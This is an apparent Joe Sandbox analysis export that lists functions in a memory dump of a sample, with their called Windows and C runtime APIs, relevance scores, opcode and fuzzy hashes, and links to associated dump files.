Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 088ec3941bee661c11e7b7363aa5810370ab6566b7808389ce37ba0df6389796
Instruction ID: eb82f424fb0d95741c8b3c136b963ead914477714104f38dcb1e016d209c97fe
Opcode Fuzzy Hash: 088ec3941bee661c11e7b7363aa5810370ab6566b7808389ce37ba0df6389796
Instruction Fuzzy Hash: 72418FB1A04198ABDF719B5488517FF7FE5DB56300F284075ECC2E7287C9218D8893E6

Function 000AE139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 000AE20C

Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC

_wcscpy.LIBCMT ref: 000AE29B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 461d2f2bc493ac0fb11ac69b3125fe7361fba3a4d149689d0c84a3172cf1483a
Instruction ID: 5e368352efda07ea71162b1a74f2f343a3512bf9a331d697da2b03ebbcf9d63f
Opcode Fuzzy Hash: 461d2f2bc493ac0fb11ac69b3125fe7361fba3a4d149689d0c84a3172cf1483a
Instruction Fuzzy Hash: 8B913835A00604DFCB29DF58C5859ADB7F5FF4A311B55845AE80A8F3A2DB30EE41CB81

Function 00096818 Relevance: 3.2, APIs: 2, Instructions: 216COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000968EC
_memmove.LIBCMT ref: 0009690A

Part of subcall function 00096A73: _memmove.LIBCMT ref: 00096B01

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction ID: 52d547d820682ea7a7ebfb51f0f61feb6ce2f0c0e90589276fa0111b4bbe0654
Opcode Fuzzy Hash: cdc4ee5d02bcf24afdfa95328405049782ae6d8391ea2411472e0393a9e56d22
Instruction Fuzzy Hash: FA71BE702006049FCF259F18D845BAEB7E9EF45324F28C908E8D52B392CB33AD41EB91

Function 0009AC0D Relevance: 3.2, APIs: 2, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

SetErrorMode.KERNELBASE(00000001), ref: 0009AC66
SetErrorMode.KERNELBASE(00000000,00000001,00000000), ref: 0009AE01

Part of subcall function 00094FEC: GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ErrorMode$AttributesFile_memmove
String ID:
API String ID: 2117146460-0
Opcode ID: 6bffadc27cffe682096665292784c38baa5f7b255dd0c711d86e5a4f8895813c
Instruction ID: 3838c2d55ce253cc99662a978c289846ab2010f7e7bbc0c42fe0ec0a6251949a
Opcode Fuzzy Hash: 6bffadc27cffe682096665292784c38baa5f7b255dd0c711d86e5a4f8895813c
Instruction Fuzzy Hash: 23514CB1508341AFD701EF28D8819AAFBE9FF89314F404A2DF49587392D771E945CB92

Function 00096135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0009614E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 85f03628d183b3e865a8bd49981ee27d4a0ccc63faea37ad718ef288b79c3d55
Instruction ID: d7c1ce8de1ee878f979e296b84ab89344eeab4f46a5bab23a43229c33b3fb3a1
Opcode Fuzzy Hash: 85f03628d183b3e865a8bd49981ee27d4a0ccc63faea37ad718ef288b79c3d55
Instruction Fuzzy Hash: FA41A2B6A00209AFDF25DFA4C8819EEB7F8EF44350B14453EE91697252EB31DA44DB50

Function 00050E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00050ED5
CreateProcessW.KERNELBASE ref: 00050EE7

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationProcess
String ID:
API String ID: 3988087930-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 1b2e8db64747b6322615de7baf5cd1faab2a84d6ad3e5a7e14ca0b8291c71ee3
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: E831C671A00109DFD768DF58C48296EF7A6FF59301B788AA5E809CB651E731EDC5CB80

Function 00045F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00045FEF

Part of subcall function 0005359C: __lock.LIBCMT ref: 000535A2
Part of subcall function 0005359C: DecodePointer.KERNEL32(00000001,?,00046004,00088892), ref: 000535AE
Part of subcall function 0005359C: EncodePointer.KERNEL32(?,?,00046004,00088892), ref: 000535B9

Part of subcall function 00045F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00045F18
Part of subcall function 00045F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00045F2D

Part of subcall function 00045240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0004526C
Part of subcall function 00045240: IsDebuggerPresent.KERNEL32 ref: 0004527E
Part of subcall function 00045240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000452E6
Part of subcall function 00045240: SetCurrentDirectoryW.KERNEL32(?), ref: 00045366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0004602F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: ff32f638a55d06c53267fa9d7481a7c8d68f7cbd879d1ec5983092addebf7b49
Instruction ID: 05d965f9c2359d13f994832311b40e0c04d63889f808dd43590d763100a9f06e
Opcode Fuzzy Hash: ff32f638a55d06c53267fa9d7481a7c8d68f7cbd879d1ec5983092addebf7b49
Instruction Fuzzy Hash: F111AF719083019BD314EF68EC4599ABFE8FF89710F00851EF444872B2DB74A949DF96

Function 00050FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0005593C: __FF_MSGBANNER.LIBCMT ref: 00055953
Part of subcall function 0005593C: __NMSG_WRITE.LIBCMT ref: 0005595A
Part of subcall function 0005593C: RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,?,00000004,?,?,00051003,?), ref: 0005597F

std::exception::exception.LIBCMT ref: 0005101C
__CxxThrowException@8.LIBCMT ref: 00051031

Part of subcall function 000587CB: RaiseException.KERNEL32(?,?,?,000ECAF8,?,?,?,?,?,00051036,?,000ECAF8,?,00000001), ref: 00058820

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: c7c7741a0c52c4cd2178dec1b197b9b08819b4663e713ffbbffdb05ad629428c
Instruction ID: 83c4bc5341d2953d66ddb42eac41a7beefdb8a11671c7ebb0a60e8a7d53ee2f9
Opcode Fuzzy Hash: c7c7741a0c52c4cd2178dec1b197b9b08819b4663e713ffbbffdb05ad629428c
Instruction Fuzzy Hash: C6F0F43050420DA6CB20BB58EC16EDF77EC9F00312F104829FC04A2192DFB18B88C7E0

Function 0005581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0005584C
__lock_file.LIBCMT ref: 0005586D

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: ba2ec1c360ab15d05dff877300c445e1bdd905c9a72e6e352ce3ea0d747e66ca
Instruction ID: edaa68bb3c5d4266fbaa373b4d7976ae4681c60a0f51270556af6c83a5ba0183
Opcode Fuzzy Hash: ba2ec1c360ab15d05dff877300c445e1bdd905c9a72e6e352ce3ea0d747e66ca
Instruction Fuzzy Hash: 03012171800749EBCF51AF668C129EF7BA1AF90363F148515BC247B1A2DB318A19DB91

Function 000555C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58

__lock_file.LIBCMT ref: 0005560B

Part of subcall function 00056E3E: __lock.LIBCMT ref: 00056E61

__fclose_nolock.LIBCMT ref: 00055616

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 1c1fafe3accc3ee49e30fab16838bffa3a0c04f5f6d228b32f1e27be9863e2cc
Instruction ID: 184cf1c5691774a70a3fbac6788079dccbee765516991f8fee89436076b8598a
Opcode Fuzzy Hash: 1c1fafe3accc3ee49e30fab16838bffa3a0c04f5f6d228b32f1e27be9863e2cc
Instruction Fuzzy Hash: FDF090B1902B059AE7206B658C22BAF77E16F40333F218609AC24BB1D2DB7C4A099B51

Function 0003E36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0003E385
Sleep.KERNEL32(00000000), ref: 0003E3BE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 5a52ebaa2017b19236348be4845ca06fc6a697f5cbee5e836a6e7d5676698c61
Instruction ID: 3af6814c5a908a9de9ef0c3edd89d7a798f6e1c848fa61666e991bac2b0d7a8b
Opcode Fuzzy Hash: 5a52ebaa2017b19236348be4845ca06fc6a697f5cbee5e836a6e7d5676698c61
Instruction Fuzzy Hash: 7BF012312446129FD364EB69D859FA6B7E8EF45351F004529E82AC73A1DF70AC40CB91

Function 00055E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00055EB4
__ftell_nolock.LIBCMT ref: 00055EBF

Part of subcall function 00058D58: __getptd_noexit.LIBCMT ref: 00058D58

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: 222d2eec77a992ee07442ea42800798a8f3e3fc8e00ebf76956ebbce9bc83e15
Instruction ID: c7f642cd595678a89c5f3e4334c60b7216c3b914adc689f3524016229440d40f
Opcode Fuzzy Hash: 222d2eec77a992ee07442ea42800798a8f3e3fc8e00ebf76956ebbce9bc83e15
Instruction Fuzzy Hash: 6CF0A031A116159AEB10BB748C037DF72A46F41333F218606AC20BB1D3CF788E0A9B91

Function 00045AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00045AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00045B1F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: f0f4653a6c5e45cf35a822e867fac5f10df7b13ebaf4c71bd166e0fcb6c7cff8
Instruction ID: f6970558f9e3e2d7ffb80af4e794edc6b63f829d8f595dc88f0fcdec199f6e8c
Opcode Fuzzy Hash: f0f4653a6c5e45cf35a822e867fac5f10df7b13ebaf4c71bd166e0fcb6c7cff8
Instruction Fuzzy Hash: 64F0A7708083089FE7D28B24DC497E677BC9700308F0001EABA4C96292D7794B98CF96

Function 000532CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 000532D5

Part of subcall function 0005329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,000532DA,00051003,?,00059EEE,000000FF,0000001E,000ECE28,00000008,00059E52,00051003,00051003), ref: 000532AA
Part of subcall function 0005329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 000532BC

ExitProcess.KERNEL32 ref: 000532DE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 6a147df61c06feb2f988bce1bd7b72282e4cc01aee30b292d6d11e3eea965748
Instruction ID: 6545c48583efcec9d96dcf4b13259dddb6fcff76ba3544974385dbd64bcd05d9
Opcode Fuzzy Hash: 6a147df61c06feb2f988bce1bd7b72282e4cc01aee30b292d6d11e3eea965748
Instruction Fuzzy Hash: E4B09231000208BBDB012F11DC0A8893F29FB00AD1F004020FC0448032DB72AAD2DA80

Function 000AC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 6b57b476cd474a6dadc319700cb6053408d12f9dbf2120a903efbcedc24ce71a
Instruction ID: 4c81826acb33edca41e52889c013af46f34487ce69da2e590453c673c7534519
Opcode Fuzzy Hash: 6b57b476cd474a6dadc319700cb6053408d12f9dbf2120a903efbcedc24ce71a
Instruction Fuzzy Hash: 81B13B75A0010AEFDF14DF98C891DEEB7B5FF49310F11811AF915AB292DB70AA41CB90

Function 0003A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8ca90573dbdc92e5c9a5cc6ec5feeb3c1a10bbad88b7a8e14aefd74e9613430
Instruction ID: f936860ceec75ae78c0209cc06cb7c3ea562bf5f5ee81bad98d1e8d2d748e0c8
Opcode Fuzzy Hash: d8ca90573dbdc92e5c9a5cc6ec5feeb3c1a10bbad88b7a8e14aefd74e9613430
Instruction Fuzzy Hash: 5261BE70B002069FCB21DF54C881BBEB7E9EF46310F15816EE85A9B292DB75ED81CB51

Function 0004343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0004351A

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 544c0db461fe5687d1b22e364178f0e94cce9633798dc6ef396c6fb350ef1d63
Instruction ID: 96624552e0a9041cf6cddac8952dd7edcd0b089ec463966d40fa7ad25d665d37
Opcode Fuzzy Hash: 544c0db461fe5687d1b22e364178f0e94cce9633798dc6ef396c6fb350ef1d63
Instruction Fuzzy Hash: E231A1B9604A02DFC724DF18D490AA6F7E4FF48360714D579E98A8B791D730ED81CB98

Function 0006E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0006E2EA

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 77b65a90597178e80e858ab04555eda6b1da9d15d0e3492bfea58f790a424be1
Instruction ID: 5dc1bb93acf61db9c4bf387afeb11156d1773b25ffefecda81af795d5346b310
Opcode Fuzzy Hash: 77b65a90597178e80e858ab04555eda6b1da9d15d0e3492bfea58f790a424be1
Instruction Fuzzy Hash: 6D412774508351DFDB65CF14C488B5ABBE5BF45318F0988ACE88A8B362C376E885CB52

Function 000449C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00044B29: FreeLibrary.KERNEL32(00000000,?), ref: 00044B63

Part of subcall function 0005547B: __wfsopen.LIBCMT ref: 00055486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,000427AF,?,00000001), ref: 000449F4

Part of subcall function 00044ADE: FreeLibrary.KERNEL32(00000000), ref: 00044B18

Part of subcall function 000448B0: _memmove.LIBCMT ref: 000448FA

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 42ce6de6ce28cdf7c922f7b9c90a096f096342006ce310933424acace3c64ac5
Instruction ID: 2e0160f4bb14e920f4abbe7b7fed94152805cb1ba3cff7a7b5d8b1d320fb3020
Opcode Fuzzy Hash: 42ce6de6ce28cdf7c922f7b9c90a096f096342006ce310933424acace3c64ac5
Instruction Fuzzy Hash: 54112772650205ABDB10FB70CC06FEE73A9EF40701F10443DF581A6183EFB09A24A799

Function 00041BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00041BFE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
